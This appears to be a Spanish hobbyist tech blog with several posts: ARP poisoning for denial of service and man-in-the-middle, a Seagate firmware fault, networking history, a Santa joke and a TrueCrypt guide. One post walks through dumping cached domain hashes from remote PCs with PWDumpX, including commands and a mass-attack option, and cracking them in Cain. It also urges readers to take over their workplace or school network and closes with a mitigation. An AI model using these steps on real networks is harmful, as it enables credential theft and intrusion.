La mejor explicación q recuerdo d lo q hace este protocolo es 1 maestra en la escuela tomando lista d asistencia el 1er dia d clases. Va diciendo los nombres 1 x 1, todos escuchan la lista pero solo responden al suyo, la maestra mientras tanto asocia nombres con caras.

Ahora supongamos q la PC1 quiere mandar 1 archivo a la PC2, lo 1ero q obtiene PC1 (digamos q tiene la dir 192.168.0.90) es la IP de PC2 (192.168.1.100). A partir d este dato tira 1 paquete ARP request a toda la red (FF:FF:FF:FF:FF:FF) diciendo:

- Soy la MAC xx:xx:xx:xx:xx:xx con la ip 192.168.0.90. Quien tiene la IP 192.168.1.100?

Todos los dispositivos hacen caso omiso salvo PC2 que responde con 1 ARP reply algo como:

- Yo tengo esa IP y mi MAC es yy:yy:yy:yy:yy:yy.

Con esto PC1 puede enviar los datos directamente al hardware de PC2. Ademas PC2 d ahora en adelante “recuerda” la MAC de PC1. Esto sucede gracias a que cada vez q 1 dispositivo c relaciona con otro estos datos quedan almacenados en el cache ARP. Este cache es 1 segmento de memoria q el sistema usa para almacenar la tabla de direcciones q ya conoce para no tener q repetir el procedimiento. D manera q si PC1 tiene q mandar alguna otra cosa a PC2 no es necesario q repita todo el proceso xq simplemente ya conoce su dirección física.

Todo parece muy bueno y eficiente, pero en realidad tiene varios problemas este sistema. Para empezar cada dispositivo tiene su propia tabla ARP, no es algo unificado x la red, y no todos los dispositivos renuevan su información con la misma frecuencia (como los routers x ej q son + lentos para refrescar) d manera q podemos llegar a estar mandando info a 1 dispositivo q ya no existe o a 1 equivocado o... montones d cosas, pero hay mas... je

El protocolo ARP no cuenta con ningun metodo d autenticacion, o sea q el dispositivo q hace el requerimiento “confia” en q la replica viene d la pc q tiene q venir... y no solo eso, sino q puede aceptar replicas sin haber hecho ningun requerimiento antes... xD

A esta altura, para los q tienen 1 poco d imaginación, ya esta bastante claro como trabaja el envenenamiento. En este escenario podriamos mandar replies ARP a cualquier dispositivo haciendole creer q la MAC q c nos ocurra esta asociada con la IP q nos convenga.

Esto nos lleva a multiples tipos d ataque, el mas facil y directo seria 1 D.O.S. (Denial of Service o Denegación de Servicio). Seria muy facil x ej envenenar la tabla d la victima para hacerle creer q la MAC del router q lo saca a internet pertenezca a X pc o a 1 q ni siquiera exista, con lo cual seguiría teniendo conexión con la LAN pero sin salida al exterior. O hacer lo mismo con 1 impresora o el dispositivo q sea para evitar la comunicación. X supuesto hay q estar constantemente mandando replicas ya q la tabla c renueva periódicamente y vuelve a la normalidad.

1 ataque como este podemos practicarlo con utilidades como Nemesis (disponible tanto para sistemas win como *nix):

http://nemesis.sourceforge.net/manpages/nemesis-arp.1.html

pero vamos a ver cosas + interesantes q 1 simple denegacion d servicio... ;)

M.I.T.M. (Man In The Middle)

Teniendo conocimiento d esta tecnica podriamos interceptar el trafico entre 2 dispositivos. Supongamos q la maquina q queremos interceptar tiene la IP 192.168.0.50 y el router la 192.168.0.1. Podriamos enviar replies ARP al router (sin q este haya solicitado nada como vimos antes) asociando la 192.168.0.50 con nuestra MAC y luego a la victima asociando a su vez la ip del router (192.168.0.1) tambien con nuestra MAC. D esta manera la victima nos estaria enviando todos los datos creyendo q somos el router y x medio d “IP forwarding” redirigimos todo el trafico hacia allí.

En el grafico siguiente podemos ver arriba el flujo normal d informacion y debajo el q seguiria durante el ataque:

X supuesto q en medio d todo esto vemos todas las claves d texto plano (ftp, telnet, etc) q manda la victima hacia fuera. El problema lo tendriamos en conexiones SSL (Secure Sockets Layer) donde c requiere 1 certificado para validar la sesion, pero utilidades como Ettercap o Cain nos dan la posibilidad d crear 1 falso certificado para engañar a la victima. El browser da aviso d q es “sospechoso”, pero como todos sabemos el user comun siempre hace click en “next”... je

Creo q con eso es suficiente como para aunque sea tener idea d lo q c hace cuando c practica este tipo d ataque. Esto no pretende ser mas que 1 explicacion algo “casera” d lo q es arp y arp poisoning, si a alguien le interesa profundizar en el tema hay muchas publicaciones profesionales donde leer y es 1 tema bastante interesante.

Grave falla en los nuevos Seagate 7200.11, ES.2 SATA y DiamondMax 22 (la plaga d las barracudas xD)

2009-02-05T11:23:00.007-02:00

Estos dias estaba buscando hds para comprar, x supuesto seagate, la mejor marca del mercado y blah blah blah. Muchos diran "pero si la mejor marca es WD? (Western Digital)"... nah... WD era la mejor marca hace muchos años, cuando los discos tenian 1gb d almacenamiento o antes todavia, despues solo conservo el nombre como muchas otras marcas. No estoy diciendo q sean los peores discos (los peores son los hitachi xD), pero si q los seagate (o maxtor q los hace la misma empresa) son muy superiores.

... o eso creia hasta hace poco... :P

Parece que seagate metio la pata en el firmware d algunas series d sus discos nuevos y c clavan al poco tiempo d haber sido comprados... algunos en - d 1 mes. No pude ver ninguno personalmente pero x lo q dicen el drive funciona ok y d repente en algun booteo c blockea y no es detectado x el setup. El disco enciende, gira, pero es como si no estuviera para el setup d la maquina.

Los modelos afectados son:

Barracuda 7200.11

Barracuda ES.2 SATA

DiamondMax 22 (Maxtor)

En principio seagate estuvo censurando las protestas d los usuarios afectados en su web pero al parecer el problema c hizo demasiado grande para taparlo y tuvieron q aceptar la falla y hacerse cargo del problema ante la posibilidad d demandas y toneladas d reclamos.

La 1er muestra d aceptacion del problema fue 1 informe en su web y 1 firmware para parchar la falla:

http://seagate.custkb.com/seagate/crm/selfservice/search.jsp?DocId=207931

en la pag c minimiza el problema diciendo q afecta a 1 pequeño num d drives y q pueden usarse como estan... aunq recomiendan hacer el upgrade d firmware q c puede encontrar en el link anterior... xD

no todo termina ahi xq despues c encontro otro problema afectando a los modelos d 500GB, 750GB y 1TB del 7200.11. upgrade para eso aca:

http://www.seagate.com/www/en-us/support/downloads/other_downloads/cuda-fw

este problema afecta al parecer al uso del cache haciendo q el disco no lo aproveche en su totalidad... 1 vez + dicen q el hd puede ser utilizado asi pero... pero... mejor upgradear... je

En el mapa podemos ver los paises con reportes d fallas marcados en rojo.

volviendo al tema principal... donde esta el problema entonces ahora? si ya esta parchado!!!

no no, el problema es q si el disco ya c vio afectado y ya no lo reconoce el setup es imposible hacer 1 upgrade d firmware xq la placa logica del disco esta muerta y para la controladora no hay ningun hd. x supuesto q la info sigue estando en los platos del disco y blah blah blah pero no esta a la mano d cualquiera recuperarlo en s estado.

cambiando la logica seguramente c salve todo facilmente pero... d donde sacar 1 logica usada d 1 hd modelo recien salido d 1tb?? imposible.

despues la empresa ofrece cambiar el disco inservible x 1 nuevo pero a mucha gente q tenia montones d cosas en el no le gusto mucho la idea d perder todo y la recuperacion d datos es muy cara... mucho + q 1 disco nuevo, pero mucho - q la info q puede llegar a contener. finalmente al parecer seagate tambien c hace cargo d la recuperacion d los datos (estando el hd en gtia x supuesto). si ud es 1 afectado d la "plaga d las barracudas" puede pedir su recuperacion d datos aca:

http://www.seagate.com/www/en-us/about/contact_us/

ir a "data recovery" y llenar formularios... xD

esto seguramente va a traer muchas bajas en las ventas d seagate si no lo arreglan rapido y dejan a todos contentos (cosa q no creo muy probable) y seguramente muchos users van a volver a WD. es 1 lastima xq seagate venia muy bien, y es increible q pasen estas cosas teniendo encima la cantidad d tests q debe tener 1 producto antes d salir a la venta.

tengan cuidado xq en la calle hay discos afectados y con el firmware viejo, fijense bien al comprar o sino atenganse a las consecuencias!!

Brevisima historia de las redes.

2009-02-04T11:05:00.007-02:00

Hace mucho tiempo (no tanto en realidad)... las computadoras eran complejos aparatos aislados unos d otros, c/u haciendo su trabajo x separado y tal vez intercambiando datos d vez en cuando x medio d tarjetas perforadas, cintas magneticas y medios d almacenamiento d este estilo...

Hasta q 1 dia alguien c dio cuenta del ahorro d tiempo, dinero y montones d otras cosas q c podia ganar interconectandolas. No solo a las computadoras sino a cualquier dispositivo q pudiera ofrecer alguna utilidad. En esa epoca impresoras, medios d almacenamiento y comunicación d datos, hasta llegar hoy en dia a tener la heladera conectada a internet entre muchas posibles cosas.

La 1era estructura d red c podria decir q fue el telegrafo en el sXIX, despues las redes telefonicas, hasta llegar a la comunicación entre computadoras. Esta c llevaba a cabo a traves d esta misma red usando MODuladores/DEModuladores (modems) q convertian la señal digital en analogica para poder usar el canal fisico (la linea telefonica) para transportarla hacia el otro extremo donde c hacia el proceso inverso (analogico/digital) para q la otra maquina pudiera entenderlo. Todo esto a traves d 1 cable d cobre q es el mismo q c utilizaba para las comunicaciones d voz y q hoy todavia existe (aunq muy mejorado) en el viejo dialup.

Este modelo d comunicación solo permitia la conexión d 1 cliente a 1 servidor pero no la interconexion d los clientes entre si. O sea q 1 maquina c conectaba contra otra y ahí quedaba todo. Esta forma d comunicación es llamada “circuit switching” o “conmutacion d circuito”.

Una comparacion facil con la conmutacion d circuito puede ser 1 conversacion telefonica normal (no ip). 1 persona establece comunicación con otra en otra parte del mundo y el canal d comunicación queda cerrado exclusivamente para esto hasta q las partes cortan como el cliente/servidor del q hablabamos antes...

Todo esto cambio en los 60´s con el concepto d “packet switching” o “conmutacion de paquetes”. La 1era red experimental d este tipo fue creada en Inglaterra, despues hubo algunas pruebas en Francia, hasta q a fines d los 60´s llego a USA donde cayo en manos del ARPA (Advanced Research Projects Agency Network). Esta creo ARPANET, q fue la 1era red operacional basada en este nuevo formato y es la base d lo q hoy conocemos como Internet.

En este modelo 1 maquina puede usar 1 unico canal d comunicación para intercambiar informacion con + d 1 sistema desensamblando los datos en datagramas y uniendolos en paquetes. De esta manera el canal puede ser compartido ademas d q los paquetes pueden ser dirigidos (routeados) independientemente unos d otros.

Desde q en 1965 c establecio la 1er red WAN del mundo, conectando 1 TX-2 en massachusets con 1 Q-32 en california (sin packet-switching) muchas cosas cambiaron, pero en resumen en 1969 c crea el 1er nodo d arpanet en la UCLA y las 1eras redes para los investigadores d ARPA y poco + tarde, en el mismo año para el resto d la comunidad universitaria.

En el ´70 nace el UNIX, poco + tarde el correo electronico y el famosisimo telnet, unos años despues el protocolo TCP/IP y las redes ethernet hasta q en el 90 arpanet deja d existir como tal y c convierte en “internet” poco despues d la aparicion d los 1eros ISP comerciales. entre unos pocos paises en argentina ya estabamos conectados... ;)

Teoria cientifica sobre papa noel (a.k.a. santa claus, san nicolas, etc)

2008-12-14T15:35:00.005-02:00

Este texto es d 1 cadena d mail d hace mucho tiempo, cuando hotmail no era d microsoft, linux era solo para geeks y la internet no estaba tan atestada d gente... cada año lo pongo en algun lado para q no c pierda xq me parece uno d los textos navideños + graciosos q vi en mi vida.

espero q lo disfruten... xD

Conclusiones sobre la no existencia de Papa Noel:

1) Ninguna especie conocida de reno puede volar. No obstante, existen 300.000 especies de organismos vivos pendientes de clasificación, y si bien la mayoría son insectos y gérmenes, no es posible descartar completamente la existencia del reno volador de Laponia septentrional.

2) En la tierra habitan alrededor de 2.000 millones de niños (considerando únicamente como tales a los menores de 18 años). Si tenemos en cuenta que Papa Noel únicamente se ocupa de los niños de confesión cristiana, la cifra de niños bajo su responsabilidad se reduce a un 15% del total, alrededor de 378 millones de niños. Según las estadísticas de población mundial facilitadas por la ONU, corresponden a 3,5 niños por hogar lo que sitúa en 91,8 millones los hogares que debieran ser visitados, suponiendo, claro esta, que haya al menos un niño por hogar que se haya portado bien.

3) Papa Noel dispone de 31 horas en Nochebuena para realizar su trabajo, gracias a los diferentes usos horarios y la rotación de la tierra. Esto supone 822,6 visitas por segundo. En otras palabras Papa Noel dispone de una milésima de segundo para aparcar, salir del trineo, bajar por la chimenea, llenar los calcetines y en su caso dejar los demás regalos bajo el árbol, comerse lo que le hayan dejado, trepar otra vez por la chimenea, subir al trineo y marchar a la siguiente casa. Suponiendo que estas 91,8 millones de paradas este distribuida uniformemente sobre la superficie de la tierra (lo cual es completamente falso pero en este caso puede servirnos para los cálculos) habrá 1,2 km. entre casa y casa lo que hace un total de 110 millones de km. De todo ello se deduce que el trineo de Papa Noel se mueve a una velocidad media de unos 1000 km./seg., 3000 veces la velocidad del sonido, 70 veces la velocidad de la sonda espacial Ulises, el vehículo más veloz construido jamas por el ser humano, y 450.000 veces la velocidad punta de un reno convencional.

4) La carga del trineo, suponiendo que cada niño sólo se lleve un tente de tamaño medio, 0,9 kg, seria del orden de 321.000 toneladas, todo ello excluyendo el peso del propio Papa Noel, al que la iconografía clásica siempre describe como bastante orondo. Un reno convencional no es capaz de transportar más alla de 150 kg, aun suponiendo que el reno volador de la Laponia septentrional pudiera multiplicar por diez esa capacidad de carga, serian necesarios unos 214.000 renos voladores.

5) Sin contar con el peso del propio trineo, hablaríamos de 353.000 toneladas de materia viajando a 1000km/seg. Un movimiento de masas de tal calibre crearía una resistencia aerodinámica enorme, lo que supondría un calentamiento de los renos similar al que experimenta una nave espacial a su entrada a la atmósfera. Cada uno de los renos de cabeza absorbería un trillón de kilojulios por segundo lo que hace estimable que el tiro completo se vaporizase en 4,26 milésimas de segundo.

Papa Noel mientras tanto sufriría unas fuerzas centrifugas 17.500 veces superiores a las de la gravedad, lo cual, estimando su peso en unos benévolos 120 kg, significaría que seria aplastado contra el asiento con una fuerza equivalente a 2.000.000 de kg, lo cual le produciría la muerte instantánea

Y de todas formas fue asesinado por Chuck Norris cuando se le olvido el regalo de Navidad de este ultimo, todo apunta a una patada giratoria como causa principal de muerte.

Conclusión: ¿Papá Noel no existe? Eso es mentira. Chuck Norris es Papá Noel. Papá Noel son tus padres. Chuck Norris es Dios y Dios es el padre de todos.

Como apoderarse de 1 dominio NT x medio del cache local

2008-10-16T13:54:00.010-03:00

Este texto es d nivel 1 poco + alto q los anteriores aunq si le prestan atención y buscan en google cualquiera con conocimientos básicos puede entenderlo. No voy a explicar todos los conceptos desde abajo ya q c espera q el lector tenga esos conocimientos... o c preocupe x obtenerlos... je... cualquier duda dejen comentarios y las contesto.

X lo gral, en las grandes redes, los administradores c preocupan de poner la mayor atención en la seguridad de sus servers dejando las estaciones d trabajo bastante + abandonadas. Esto tiene cierta logica ya q el mayor peligro esta en 1 atacante q logre acceso x ej al Domain Controller (d ahora en adelante DC) o simplemente a la clave d admin d dominio.

Teniendo los servers asegurados tenemos asegurada la bd d usuarios con sus hashes y teóricamente lo unico q podria conseguir 1 atacante desde 1 estacion d trabajo es alguna pass local q como mucho le serviria para moverse x las pcs (en entornos corporativos c usa la misma pass d admin local en los clientes en el 99% d los casos) pero no poder pasar d ahí hacia los servers... entonces el dominio estaria asegurado... o no?? xD

Hace unas semanas vimos como conseguir la pass local en pocos mins:

Crackear contraseñas locales de Windows

este metodo puede fallar pero teniendo 1 buen poder d proceso y tiempo todo c puede crackear (en el futuro veremos q hacer si el ophcrack no encuentra la pass), todo depende d si vale o no la pena el tiempo a invertir. Vamos a ver entonces como con derechos locales podemos conseguir algunos hashes de dominio y con 1 poco d suerte y casi nada d riesgo tal vez el del admin.

MSCache

Cuando logueamos en 1 dominio (ahora Active Directory o AD) nuestra contraseña se envia encriptada al DC donde c comprueba q sea correcta para dejarnos ingresar y aplicar nuestros derechos sobre la red. Todo este proceso es mucho + seguro q loguear en 1 pc local o en 1 grupo d trabajo... o tendría q serlo ya q teóricamente los passes deberían estar alojados solamente en el DC.

Q pasaria entonces si tenemos 1 laptop corporativa cuyo user loguea en el dominio d la empresa cuando este no esta en la misma? Para poder usar su maquina fuera del trabajo deberia tener 2 users, 1 local y 1 del AD, ya q al no poder acceder a la red no podria autenticar su pass y x lo tanto loguear en el sistema, acceder a su perfil d dominio, etc.

Pero parece q los sres d Microsoft creyeron q era demasiado trabajo para sus pobres users, y decidieron cachear la pass en el sistema para poder loguear cuando no este disponible el DC. De esta manera cuando ingresamos al dominio nuestra pass queda en cache en el registro d win y podemos loguear sin estar conectados a ninguna parte con la ultima q accedimos. X supuesto q si la pass c cambia en el DC mientras esta desconectada va a seguir usando la del cache hasta q vuelva a la red y vea q hay 1 nueva. A partir d s momento cachea la nueva pass.

A esta altura ya estaran viendo adonde apunta todo esto. Muy sencillo... conseguir el hash cacheado, crackearlo y... bue... 1 agujero de seguridad enorme!!... je

PWDumpX

PWDumpX es la herramienta con la q vamos a extraer los hashes. Tambien lo podriamos hacer con Cain, q vamos a usar + tarde para desencriptar, pero tenemos 1 pequeña desventaja... con Cain podemos sacar los hashes d dominio alojados localmente, en cambio con PWDumpX podemos sacarlos d cualquier pc d la red sobre la q tengamos derechos d admin local (el agujero c agranda xD)...

Esta herramienta fue escrita en perl x Reed Arbin y la pueden bajar de aca:

http://reedarvin.thearvins.com/tools.html

el uso es bastante sencillo. Descomprimimos a alguna carpeta en el rigido y lo corremos desde ahí. Esta es la ayuda:

Usage: PWDumpX [-clph]

[-clph] -- optional argument
-- required argument
-- required argument
-- required argument

-c -- Dump Password Cache
-l -- Dump LSA Secrets
-p -- Dump Password Hashes
-h -- Dump Password History Hashes

If the and arguments are both plus signs (+), the
existing credentials of the user running this utility will be used.

Examples:
PWDumpX 10.10.10.10 + +
PWDumpX 10.10.10.10 administrator password

PWDumpX -lp MyWindowsMachine + +
PWDumpX -lp MyWindowsMachine administrator password

PWDumpX -clph IPInputFile.txt + +
PWDumpX -clph IPInputFile.txt administrator password

Como podemos ver tambien puede extraer los hashes normales, lsa secrets, etc… pero lo q nos interesa a nosotros es la opcion “-c” o sea “dump password cache”. Entonces el formato seria:

Pwdumpx –c nombrepcvictima user password

X supuesto como ya dijimos el user debe tener derechos d admin sobre la victima. Si queremos usar las credenciales con las q estamos logueados seria asi:

Pwdumpx –c nombrepcvictima + +

En pantalla veriamos esto:

MULTIVAC-DC2 es el DC secundario d mi red. Lo hice contra s xq era lo q tenia + a mano, x supuesto q en la realidad c puede complicar 1 poco + y van a tener q buscar 1 pc donde c haya logueado el admin d dominio o el user q les interese.

El pwdumpx como vemos en la captura devuelve 1 fila llamada multivac-dc2-PWCache.txt, vamos a buscar el archivo y encontramos esto dentro:

Administrator:B3A0102769XXXXXXXXXXD535D35E8363:MULTIVAC:MULTIVAC.LOCUTUS

Los campos estan bastante claros. User, hash, nombre dominio (pre2k) y nombre del AD (multivac.locutus). Como pueden ver puse algunas “X” para q no salga el hash completo y alguno c ponga a crackearme la pass. xD

Si hay + passes cacheados salen en el mismo formato 1 debajo del otro, ya con ellos nos podemos ir a crackearlas a 1 lugar + tranquilo...

Esta tambien la opcion si a alguien le interesa d poner 1 lista d pcs victima en 1 txt para hacer 1 ataque masivo y llevarnos todos los hashes q podamos, c hace simplemente cambiando el campo nombredelavictima x el txt.

Crackeando con CAIN

No voy a ponerme tampoco a explicar el uso d CAIN. Se supone q el q lee esto tiene idea d como usarlo o las ganas d aprender ya q tampoco es tan difícil lo q tenemos q hacer. El CAIN se descarga d aca:

http://www.oxid.it/cain.html

abrimos el soft y vamos a la pestaña “cracker” y en la lista d la izquierda podemos ver en 3er lugar “mscache hashes”. Si hacemos click y presionamos el boton “+” q c encuentra arriba podemos extraer los locales, d forma q tambien podriamos usar cain sin tener q recurrir al pwdumpx si lo q queremos son los hashes d users d dominio almacenados localmente. Lo q no podemos hacer es extraer los remotos.

El problema con el q nos encontramos es q no nos permite importar y x lo tanto no podemos introducir los hashes q traemos del pwdumpx. Para esto vamos a hacer 1 pequeño truquito.

Con cain cerrado vamos al dir d instalación y buscamos el archivo “CACHE.LST”. Si le dimos al boton + antes y obtuvimos algo, podemos ver q en el archivo c encuentran los hashes q saco d la pc pero en este formato:

MULTIVAC LOCUTUS B713D9AXXXXXXXXXX9FA9FE639874737

O sea… dominio (pre2k), usuario y hash. Lo q tenemos q hacer es agregar el q tenemos debajo d este d manera q quedaria:

MULTIVAC LOCUTUS B713D9AXXXXXXXXXX9FA9FE639874737
MULTIVAC ADMINISTRATOR B3A0102769XXXXXXXXXXD535D35E8363

Muy importante... poner después d cada hash q c agrega 1 tabulacion y 1 salto d linea para q c vea. El formato final seria dominio – 1 tab – user - 2 tabs – hash – 1 tab – newline. Abrimos nuevamente cain y ya los podemos ver:

ahora nos queda lo + largo... crackearla. Para esto podemos usar distintos metodos según lo q tengamos. Haciendo click derecho sobre la entrada vemos las posibilidades:

Podemos elegir entre ataque x medio d diccionarios, fuerza bruta o rainbow tables. Las rainbow no son las estandard sino q son especificas para mscache. Pueden descargarlas d algun p2p o generarlas uds mismos con alguno d los softs q andan x ahí para s fin. Tambien tienen opcion d testear passes a mano si tienen alguna idea d q puede ser.

Finalmente lo unico q queda es ir a su trabajo, escuela o lo q sea y pasar a ser dueño absoluto d la red.... je... sean eticos y no hagan maldades.

Me olvidaba algo importante... xD

Hay una key en el registro para determinar cuantos users pueden almacenarse. la key es:

CachedLogonsCount

y esta en:

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

El valor x defecto es 20, o sea q el sistema cachea hasta 20 passes. Poniendo el valor en 0 se deshabilita el cacheo de passes d dominio, asi q los admins ya saben lo q tienen q hacer... ;)

TrueCrypt - Como mantener nuestros datos a salvo d extraños... (aunque nos apunten con 1 arma xd)

2008-10-02T16:10:00.020-03:00

La privacidad es algo q la mayoria de la gente parece tomar muy en serio si c le pregunta, pero a la hora d preservar sus datos electronicos la mayoria son capaces de dejar en 1 txt del escritorio sus numeros de tarjeta con cvv incluido + num d cuenta del bco + pin. No hay una toma d conciencia d q los datos privados pueden ser accedidos x 1 atacante externo ya q hoy en dia todo esta conectado a internet, o tambien x alguien q logre acceso fisico a la pc.

Paranoia? Mmm... 1 poco tal vez. No c olviden nunca q 1 poco d paranoia es buena en este tema. 1 viejisimo dicho d la cultura under es el famoso “be paranoid”, q creo q nunca va a pasar d moda... y hasta puede ser q tenga cada dia + validez. Nuestros datos son solo nuestros y nadie tiene q andar husmeando x ahí... hay q tener en cuenta q cualquier cosa puede ayudar a conocer el perfil d 1 persona para luego usar con ella ingenieria social. Cualquier dato, al parecer d muchos insignificante, q nos puedan robar puede a ayudar a concretar 1 estafa o lo q sea. Hay q resguardar todo d ser posible, pero aunq sea empecemos x la info sensible. Despues si quieren encriptan todo el hd... ;)

Q podemos hacer para lograr esto? Simple... usar la criptografia o encriptación de nuestros datos. Veamos la definición d criptografia según wikipedia:

La criptografía (del griego κρύπτω krypto, «oculto», y γράφω graphos, «escribir», literalmente «escritura oculta») es el arte o ciencia de cifrar y descifrar información utilizando técnicas que hagan posible el intercambio de mensajes de manera segura que sólo puedan ser leídos por las personas a quienes van dirigidos.

Con más precisión, cuando se habla de esta área de conocimiento como ciencia se debería hablar de criptología, que engloba tanto las técnicas de cifrado, la criptografía propiamente dicha, como sus técnicas complementarias: el criptoanálisis, que estudia los métodos que se utilizan para romper textos cifrados con objeto de recuperar la información original en ausencia de las claves.

No voy a dar 1 explicacion de criptografia ya q no soy el + indicado, ademas d q no es el punto d este tema pero x lo q leemos arriba podemos darnos 1 idea d lo q estamos haciendo. La idea consiste en tomar 1 texto plano y, x medio d 1 algoritmo d encriptación y x lo gral 1 clave, convertirlo en algo ilegible e imposible d recuperar a – q tengamos la dicha clave.

Hay 1 soft muy bueno q nos va a ayudar a hacer esto y ademas d todo lo mejor es q... es completamente free!!. El software es el famoso Truecrypt y lo pueden bajar d su pagina oficial:

http://www.truecrypt.org/

viene tanto en versión windows como tambien osX y linux. La instalación es muy sencilla, el tipico next->next->finish. Podemos básicamente encriptar datos d 3 formas.

· Crear 1 contenedor para los archivos q después montamos como 1 unidad +
· Encriptar 1 particion q no tenga SO.

· Encriptar 1 particion q contenga 1 SO en la cual nos va a pedir clave en el booteo

Al iniciar el programa hacemos click en el boton “crear volumen” y nos aparece 1 ventana como esta:

ahí podemos ver las 3 opciones d las q hablábamos. Vamos a crear 1 contenedor q la verdad q me parece lo + comodo y lo + facil d ocultar. El principio basico es q si el atacante no sabe siquiera q hay datos encriptados o donde estan le va a resultar mucho + dificil conseguirlos desencriptados... xD

El contenedor es simplemente 1 archivo como cualquier otro q puede ser movido, copiado o borrado como cualquiera sin perder sus características. Entonces... “create a file container”, next y vemos esta otra pantalla:

tipo d volumen... standard u oculto... vamos a ver esto con 1 poco d detalle xq vale la pena.

El standard es lo q hablábamos antes, 1 fila encriptada normal a la cual podemos poner donde queramos o con los atributos q c nos ocurra. X ej podemos ponerla como oculta, sistema y ponerle algun nombre q parezca algo d nuestro SO... alguna dll inexistente d system32 x ej si usamos windows.

Pero q pasa si tenemos 1 atacante frente a frente q sabe q tenemos 1 particion oculta apuntándonos con 1 9mm amenazándonos con vaciar el cargador en nuestra cabezita si no le decimos donde esta el contenedor y le damos la pass?? O tal vez el asunto sea + leve pero llevandonos a la situación d tener q poner la pass y mostrar el contenido a otra persona. Demasiada paranoia?? Mmm.... hay q pensar en todo siempre. ;)

Para eso justamente existe el tipo d volumen oculto. Lo q hace este sistema es meter 1 particion encriptada dentro d otra. En este grafico c v bastante claro:

arriba vemos 1 particion standard d truecrypt, lo q esta en verde es la cabecera, lo violeta el espacio ocupado x archivos y finalmente lo gris es el espacio libre. El detalle es q el espacio libre esta formado x info aleatoria... esta es la forma en q c crea cualquier partición d truecrypt.

Ahora... si en s espacio libre metemos 1 particion a su vez encriptada seria imposible diferenciarla d los datos aleatorios... perfecto!!

En el 2do grafico ya tenemos la partición oculta representada x el color azul. Detrás de la cabecera d la anterior (verde) podemos ver 1 nueva cabecera en celeste q es la del volumen oculto. Tanto la cabecera como la partición son imposibles d reconocer sin la clave, sin ella siguen siendo “info aleatoria” exactamente igual al espacio libre... ;)

Entonces... vamos a tener 2 claves distintas. 1 para la partición encriptada “normal” y otra para la "oculta”. X supuesto q deben ser distintas. Entonces, cuando ponemos la pass d la 1era partición entra directamente a esta y toma el resto como “espacio libre” o “datos aleatorios”. Si ponemos en cambio la pass de la 2da, la 1er cabecera la toma como incorrecta y pasa el control a la 2da q monta la partición oculta.

Asi podemos tener en la 1era partición algun dato q no nos importe q vean y lo valioso en la 2da. No “pass incorrecta” ni nada d eso. Bueno... este metodo solo en caso d “extrema paranoia”. Sigamos con el metodo “normal”. Elegimos la opcion d “standard truecrypt volume” y vamos a la siguiente ventana:

nos pide 1 nombre d archivo para crear el volumen encriptado. Ponemos ruta y nombre q tengamos ganas. Recomendable como deciamos antes meterlo en algun lado q parezca algun archivo d sistema o cualquier cosa q no llame demasiado la atención. Tambien c puede seleccionar 1 archivo existente, el cual seria destruido en el proceso. Siguiente y vamos a:

el tipo d algoritmo d encriptación q queremos usar, todos son bastante difíciles d romper. Hay q tener en cuenta q a mayor complejidad del algoritmo mayor es el tiempo d encriptación/decriptacion d los archivos con los q trabajamos. Haciendo click en el boton “benchmark” c pueden comparar tiempos d c/u.

en la pantalla siguiente definimos el tamaño d la partición. Si solo queremos guardar unos pocos datos de texto con unos kbs alcanza. Next y vamos a la pantalla d password:

no pongan 12345... xD

después c formatea el archivo en el sistema q le digamos, pide mover el mouse para recolectar info aleatoria y ya tememos listo el archivo.

Para abrirlo desde la ventana principal de truecrypt seleccionamos 1 letra d unidad, clickeamos en “select file” y elegimos el archivo encriptado:

haciendo click en “mount” c abre el cuadro q nos pide el pass correspodiente y al introducirlo ya tenemos el volumen encriptado montado en la letra d unidad q elegimos.

Con esto sus datos ya deberían estar a salvo... ;)